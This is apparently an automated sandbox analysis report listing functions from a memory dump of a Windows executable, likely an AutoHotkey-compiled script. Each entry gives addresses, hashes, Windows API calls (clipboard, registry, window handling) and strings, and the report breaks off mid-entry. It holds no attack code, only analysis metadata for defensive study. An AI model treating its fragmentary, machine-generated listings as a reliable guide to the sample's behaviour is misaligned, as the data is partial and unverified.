Opcode ID: 13d8338b8e32807ed1abe58794a03d846ebbc83b3d7f497c9309eaf9b970c287
Instruction ID: da279f355416ff0689fd4ef36d58f29d2e0c6ac99d17ef77313418c0b07e8747
Opcode Fuzzy Hash: 13d8338b8e32807ed1abe58794a03d846ebbc83b3d7f497c9309eaf9b970c287
Instruction Fuzzy Hash: C4B0017A90CB62AAF4AE805B08867D84B84A72D3E2EA40012A780939B15A214A064570

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400C22A8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f77cbd4ba229d5f9d89bc511dccc266988c2a10cf2c1ee8df355cd47571e33b
Instruction ID: 5e0fd55521ba828121403b7a0df44c9d17dfedda332558db212396c4502ac5fd
Opcode Fuzzy Hash: 1f77cbd4ba229d5f9d89bc511dccc266988c2a10cf2c1ee8df355cd47571e33b
Instruction Fuzzy Hash: E9B0127F80C2C070F22F052145123C41B50D3193D3E144400965007DA12069080226A2

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400C24B8, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07237094ce9abc0c32c1583791eab327f72dcd14f752851c8162a738c07759a4
Instruction ID: 893b6835442a055096430e6df04771dc2a20a34ca020f3acfe36159fe2c79b24
Opcode Fuzzy Hash: 07237094ce9abc0c32c1583791eab327f72dcd14f752851c8162a738c07759a4
Instruction Fuzzy Hash: 63A0113A00CFC003E00F022208203A80E08C328382F0A00882388A38A2802A80008B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140077360, Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 282COMMON

Download Yara Rule

APIs

GetStockObject.GDI32 ref: 0000000140077423
GetDC.USER32 ref: 0000000140077448
SelectObject.GDI32 ref: 0000000140077471
GetTextFaceW.GDI32 ref: 0000000140077497
GetTextMetricsW.GDI32 ref: 00000001400774A4
GetDeviceCaps.GDI32 ref: 00000001400774C7
MulDiv.KERNEL32 ref: 00000001400774DB
SelectObject.GDI32 ref: 0000000140077522
ReleaseDC.USER32 ref: 000000014007752D

Strings

Too many fonts., xrefs: 00000001400778F1
MZ@, xrefs: 00000001400775FE
Out of memory., xrefs: 00000001400773E3
Can't create font., xrefs: 000000014007798A

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Object$SelectText$CapsDeviceFaceMetricsReleaseStock
String ID: Can't create font.$MZ@$Out of memory.$Too many fonts.
API String ID: 1892915389-1907805418
Opcode ID: 285a8c75e2b0eec7d6838896e64cc54240e035821748be0b9cb73e2184ac6cf1
Instruction ID: 8bb4bd549d31a91c08014da5a3b94ad807a9144d991d3f6276ab272ae06d509e
Opcode Fuzzy Hash: 285a8c75e2b0eec7d6838896e64cc54240e035821748be0b9cb73e2184ac6cf1
Instruction Fuzzy Hash: A4E18E72A04A8086F766DF3AE8457E977B0FB59798F049215EF8913AB6DF38C185C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005A6A0, Relevance: 30.2, APIs: 9, Strings: 8, Instructions: 444COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32 ref: 000000014005A762
IsDlgButtonChecked.USER32 ref: 000000014005AC24
IsDlgButtonChecked.USER32 ref: 000000014005AC70
IsDlgButtonChecked.USER32 ref: 000000014005AC95
IsDlgButtonChecked.USER32 ref: 000000014005ACB6
IsDlgButtonChecked.USER32 ref: 000000014005ACD2

Strings

Expand, xrefs: 000000014005A953
Icon, xrefs: 000000014005AA1E
Check, xrefs: 000000014005A9CE
First, xrefs: 000000014005A8F6, 000000014005AAA8
Vis, xrefs: 000000014005A8E3
Bold, xrefs: 000000014005A925
Sort, xrefs: 000000014005AA53
Select, xrefs: 000000014005A8B1

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ButtonChecked
String ID: Bold$Check$Expand$First$Icon$Select$Sort$Vis
API String ID: 1719414920-3745070880
Opcode ID: 6ff702638ef8f24b4b8001b01c2105c52c6ef1ff4b5084c2bcbd7e80eea64445
Instruction ID: 3768ce8c1d5d1f3c0b09fdacb6be2083d57aaa242073812ede17eca4da527a86
Opcode Fuzzy Hash: 6ff702638ef8f24b4b8001b01c2105c52c6ef1ff4b5084c2bcbd7e80eea64445
Instruction Fuzzy Hash: 1612C0367026518AFB62DB6394503EE37A2E71E7D8F444115EF4A436E5EB3EC856C380

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140005000, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 148clipboardCOMMON

Download Yara Rule

APIs

EmptyClipboard.USER32 ref: 0000000140005031
GlobalUnWire.KERNEL32 ref: 000000014000504B
CloseClipboard.USER32 ref: 0000000140005055
GlobalUnWire.KERNEL32 ref: 0000000140005099
GlobalFree.KERNEL32 ref: 00000001400050B3
GlobalUnWire.KERNEL32 ref: 00000001400050CB
CloseClipboard.USER32 ref: 00000001400050D5
GlobalUnWire.KERNEL32 ref: 0000000140005175
CloseClipboard.USER32 ref: 000000014000517F
GlobalUnWire.KERNEL32 ref: 0000000140005195
GlobalFree.KERNEL32 ref: 00000001400051AB

Strings

Can't open clipboard for writing., xrefs: 0000000140005018
EmptyClipboard, xrefs: 0000000140005061
SetClipboardData, xrefs: 000000014000512F

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Global$Wire$Clipboard$Close$Free$Empty
String ID: Can't open clipboard for writing.$EmptyClipboard$SetClipboardData
API String ID: 3076736919-2690908087
Opcode ID: 944d13a079bfad3a1d27f904f8be0015b0d40e28c0bbe0f74327dea52fbeca54
Instruction ID: 8cdbb77d7fb2e15ab45304592f0996a7f8fac11dae921694216e4d2d81027e53
Opcode Fuzzy Hash: 944d13a079bfad3a1d27f904f8be0015b0d40e28c0bbe0f74327dea52fbeca54
Instruction Fuzzy Hash: 4D610772615B50C2E766EF26E54039E63A4F74CFC5F044026FB5A43A64DF78C9A28B80

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140065490, Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 234COMMON

Download Yara Rule

APIs

SafeArrayCopy.OLEAUT32 ref: 0000000140065570
new.LIBCMT ref: 0000000140065585
SafeArrayGetUBound.OLEAUT32 ref: 00000001400655FB
SafeArrayGetUBound.OLEAUT32 ref: 0000000140065612
SafeArrayGetLBound.OLEAUT32 ref: 0000000140065652
SafeArrayGetDim.OLEAUT32 ref: 00000001400656B0
SafeArrayLock.OLEAUT32 ref: 0000000140065717
SafeArrayPtrOfIndex.OLEAUT32 ref: 000000014006572D
SafeArrayUnlock.OLEAUT32 ref: 0000000140065795

Strings

NewEnum, xrefs: 0000000140065516
MinIndex, xrefs: 000000014006561A
MaxIndex, xrefs: 00000001400655C7
Clone, xrefs: 0000000140065555

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ArraySafe$Bound$CopyIndexLockUnlock
String ID: Clone$MaxIndex$MinIndex$NewEnum
API String ID: 3488678136-1840840349
Opcode ID: 95df7429b8a6efae4e37ef178d07c49c5fcd7bfe58ef3cd18e87779838c62c61
Instruction ID: ab8083edc58ccb944e7b54692ab3ab7c3604abcbf93eb9e4f8691ab038c0ef10
Opcode Fuzzy Hash: 95df7429b8a6efae4e37ef178d07c49c5fcd7bfe58ef3cd18e87779838c62c61
Instruction Fuzzy Hash: C6918D7630874086E726AB27E9903EA22A2FB9CBD1F604925FF4D477A5EF38C445C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014006D050, Relevance: 22.7, APIs: 15, Instructions: 181windowCOMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32 ref: 000000014006D0C4
IsDlgButtonChecked.USER32 ref: 000000014006D0EF
DestroyCursor.USER32 ref: 000000014006D0FD
IsWindow.USER32 ref: 000000014006D110
ShowWindow.USER32 ref: 000000014006D120
SetMenu.USER32 ref: 000000014006D12C
DestroyWindow.USER32 ref: 000000014006D146
DeleteObject.GDI32 ref: 000000014006D1B1
DeleteObject.GDI32 ref: 000000014006D1CA
DragFinish.SHELL32 ref: 000000014006D1E3
DestroyCursor.USER32 ref: 000000014006D226
DeleteObject.GDI32 ref: 000000014006D22E
DestroyCursor.USER32 ref: 000000014006D2A7
DestroyCursor.USER32 ref: 000000014006D2B0
DestroyAcceleratorTable.USER32 ref: 000000014006D2CC

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Destroy$Cursor$DeleteObjectWindow$ButtonChecked$AcceleratorDragFinishMenuShowTable
String ID:
API String ID: 1170331340-0
Opcode ID: b5340f0a90600fcd07411b7b21e4ed29094b8956f556f7d34318a614ca40f12a
Instruction ID: 49617f467b8cf74bf1130b7512a6299a15c3a1fcf20848029ac5f8274c5b5e3f
Opcode Fuzzy Hash: b5340f0a90600fcd07411b7b21e4ed29094b8956f556f7d34318a614ca40f12a
Instruction Fuzzy Hash: 67815031A05A4086EB669F23D8607A837A2FB9DFC4F294526EF4E47BB5CF74C4518740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140016460, Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 196registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32 ref: 000000014001671F

Strings

HKEY_USERS, xrefs: 000000014001669B
HKEY_LOCAL_MACHINE, xrefs: 00000001400165E7
HKLM, xrefs: 00000001400165CE
HKEY_CLASSES_ROOT, xrefs: 0000000140016619
HKCC, xrefs: 0000000140016632
HKEY_CURRENT_CONFIG, xrefs: 0000000140016647
HKEY_CURRENT_USER, xrefs: 0000000140016671
HKCU, xrefs: 000000014001665C
HKU, xrefs: 0000000140016686
HKCR, xrefs: 0000000140016600

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ConnectRegistry
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 76216097-909552448
Opcode ID: 26370df828495746206cd905ff306e32af02d5ccf830f3e842f60e0882a1e1ad
Instruction ID: a9ff73c85bc45bcdeda9cf49b9fe6f8c3b4bdc73c2085efb56f3ec9a657daecf
Opcode Fuzzy Hash: 26370df828495746206cd905ff306e32af02d5ccf830f3e842f60e0882a1e1ad
Instruction Fuzzy Hash: EC819272314A9191EF629B3799403E963B2BB5C7D4F884212BF494B2F9EB3ACD45C350

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005F5B8, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 141windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32 ref: 000000014005F51B
GetParent.USER32 ref: 000000014005F538
GetDlgCtrlID.USER32 ref: 000000014005F54D
SendMessageTimeoutW.USER32 ref: 000000014005F58B
GetClassNameW.USER32 ref: 000000014005F5C9
GetWindowLongW.USER32 ref: 000000014005F61D
SendMessageTimeoutW.USER32 ref: 000000014005F657
SendMessageTimeoutW.USER32 ref: 000000014005F695
SendMessageTimeoutW.USER32 ref: 000000014005F6F1

Strings

Combo, xrefs: 000000014005F5D3
List, xrefs: 000000014005F5FD

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: MessageSendTimeout$ClassCtrlLongNameParentWindow
String ID: Combo$List
API String ID: 3777435429-1246219895
Opcode ID: e158e1717114a251a76e4b9c520670fd461f2d81e3cefd9c014bd41281181cf5
Instruction ID: b772edbb957e94b00b02f6893e4d0f75371d3f18f43f13725f4b81525140ec9f
Opcode Fuzzy Hash: e158e1717114a251a76e4b9c520670fd461f2d81e3cefd9c014bd41281181cf5
Instruction Fuzzy Hash: 3A515931608B4096FB668B12E4443EE22A1BB4DBF4F541329AB6917BF5DF3DC646D700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400756B0, Relevance: 16.6, APIs: 11, Instructions: 116COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32 ref: 0000000140075716
DestroyCursor.USER32 ref: 000000014007571F
IsDlgButtonChecked.USER32 ref: 000000014007572A
DeleteObject.GDI32 ref: 0000000140075733
DestroyCursor.USER32 ref: 0000000140075779
GetWindowLongW.USER32 ref: 000000014007578D
SetWindowLongW.USER32 ref: 00000001400757BC
IsDlgButtonChecked.USER32 ref: 00000001400757D4
IsDlgButtonChecked.USER32 ref: 00000001400757E8
DeleteObject.GDI32 ref: 0000000140075803
DestroyCursor.USER32 ref: 000000014007580B

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ButtonChecked$CursorDestroy$DeleteLongObjectWindow
String ID:
API String ID: 389117749-0
Opcode ID: c1f1f8f17667f8f475f288daafe17c9e374a8b79a6f60ee8736c28efabd35dda
Instruction ID: ed0c8ef6aafc15d6c63daccdea33b028d26932d24357fad611243bcdb364ca8d
Opcode Fuzzy Hash: c1f1f8f17667f8f475f288daafe17c9e374a8b79a6f60ee8736c28efabd35dda
Instruction Fuzzy Hash: C841B432609B5083EB6A9B26B4443DD63A1F78CBD1F084224EF5A47BB5DF7CD8618740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001B17E, Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 207COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 000000014001B251
IsCharUpperW.USER32 ref: 000000014001B2D7

Strings

MZ@, xrefs: 000000014001ACE2
*%s up::, xrefs: 000000014001AC37
Up, xrefs: 000000014001B140
%s%s, xrefs: 000000014001B2F4
Return, xrefs: 000000014001B36D
{RCtrl up}, xrefs: 000000014001ABC7
{Blind}%s%s{%s DownTemp}, xrefs: 000000014001ABEE

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CharKeyboardLayoutUpper
String ID: Up$%s%s$*%s up::$MZ@$Return${Blind}%s%s{%s DownTemp}${RCtrl up}
API String ID: 1521781519-2661527432
Opcode ID: 83bea9f5c9f2c212854be2cc17a8ddbf30fc7cdbf2a6934c4dd75f39810daca4
Instruction ID: 8fa502d053fc462ada1aee07451814befdd41df66258210f1c8505a0bb76aa1d
Opcode Fuzzy Hash: 83bea9f5c9f2c212854be2cc17a8ddbf30fc7cdbf2a6934c4dd75f39810daca4
Instruction Fuzzy Hash: 4991C43260468085F762DB67E4103EE37A1F71E7D8F844206FB894BAE5DB3AC985C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005F44F, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 000000014005F475
GetWindowLongW.USER32 ref: 000000014005F4BF
SendMessageTimeoutW.USER32 ref: 000000014005F51B
GetParent.USER32 ref: 000000014005F538
GetDlgCtrlID.USER32 ref: 000000014005F54D
SendMessageTimeoutW.USER32 ref: 000000014005F58B
SendMessageTimeoutW.USER32 ref: 000000014005F6F1

Strings

Combo, xrefs: 000000014005F47F
List, xrefs: 000000014005F49F

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: MessageSendTimeout$ClassCtrlLongNameParentWindow
String ID: Combo$List
API String ID: 3777435429-1246219895
Opcode ID: 357cb6d31329169efcd2c8796749eb5b79269a8f10022a6fda966abd1bb39645
Instruction ID: f72f2960ced385c8e84426b8a495345fb9eb6606b83870fb1fcf41c4df0a1ab8
Opcode Fuzzy Hash: 357cb6d31329169efcd2c8796749eb5b79269a8f10022a6fda966abd1bb39645
Instruction Fuzzy Hash: 5F516731204B4086FB668B22E4843EE23A1BB8CBE4F541325AB6917BF5DF7DC646D740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140040414, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 0000000140040435
SetLastError.KERNEL32 ref: 000000014004048F
SetWindowLongW.USER32 ref: 000000014004049E
GetLastError.KERNEL32 ref: 00000001400404A8
GetWindowLongW.USER32 ref: 00000001400404BC
SetWindowPos.USER32 ref: 00000001400404E7
InvalidateRect.USER32 ref: 00000001400404F5

Strings

7, xrefs: 00000001400404CC
+-^, xrefs: 000000014004043E

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$Long$ErrorLast$InvalidateRect
String ID: +-^$7
API String ID: 189950902-219994616
Opcode ID: d35b465c0f684efccb8b1ee4aa4c1da412e159d21a51a54df95c7811f4ed3bdb
Instruction ID: 754f9ec128f084983e54af236b9af11ed71ac1fb0d618cba7fdf9b07c08779e1
Opcode Fuzzy Hash: d35b465c0f684efccb8b1ee4aa4c1da412e159d21a51a54df95c7811f4ed3bdb
Instruction Fuzzy Hash: 7931EA72204A4085F7669B27A8903EE23A0B7CCBE4F594635FF1A976F5DA3CC4818704

Uniqueness

Uniqueness Score: -1.00%

Function 000000014007D4F0, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 46windowCOMMON

Download Yara Rule

APIs

AppendMenuW.USER32 ref: 000000014007D522
SetMenuDefaultItem.USER32 ref: 000000014007D544
AppendMenuW.USER32 ref: 000000014007D55D
AppendMenuW.USER32 ref: 000000014007D576
AppendMenuW.USER32 ref: 000000014007D58F

Strings

&Suspend Hotkeys, xrefs: 000000014007D54E
&Pause Script, xrefs: 000000014007D567
&Open, xrefs: 000000014007D513
E&xit, xrefs: 000000014007D580

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Menu$Append$DefaultItem
String ID: &Open$&Pause Script$&Suspend Hotkeys$E&xit
API String ID: 1113060144-2349458590
Opcode ID: c0e4fa273737c13b4c1f0123fb66eec0508b1fe55e33a9d2272a92daebfbe634
Instruction ID: 25f9bd74f4c91a680944e4a06431cbcae0c0cf409277f3154b641d99afa1fbcc
Opcode Fuzzy Hash: c0e4fa273737c13b4c1f0123fb66eec0508b1fe55e33a9d2272a92daebfbe634
Instruction Fuzzy Hash: 90113D71201952CAFB66DB67E8047A427A1BB8DB88F845023EA09479B4CF38C889D341

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140087230, Relevance: 15.1, APIs: 10, Instructions: 116COMMON

Download Yara Rule

APIs

CharLowerW.USER32 ref: 0000000140087255
CharUpperW.USER32 ref: 000000014008726B
CharLowerW.USER32 ref: 000000014008729E
CharUpperW.USER32 ref: 00000001400872B4
CharLowerW.USER32 ref: 00000001400872FC
CharLowerW.USER32 ref: 0000000140087308
CharLowerW.USER32 ref: 0000000140087321
CharLowerW.USER32 ref: 000000014008732E
CharLowerW.USER32 ref: 000000014008734B
CharLowerW.USER32 ref: 0000000140087357

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Char$Lower$Upper
String ID:
API String ID: 3371602591-0
Opcode ID: 4396e1471de1499f74233c48f3256c8c52fb829ccdef19fdb9ff9fb9e933ba6f
Instruction ID: 1fe7b556c6922e9af3928dc2c2cb492fee6205eda3a3f6f097dda490b23bfde0
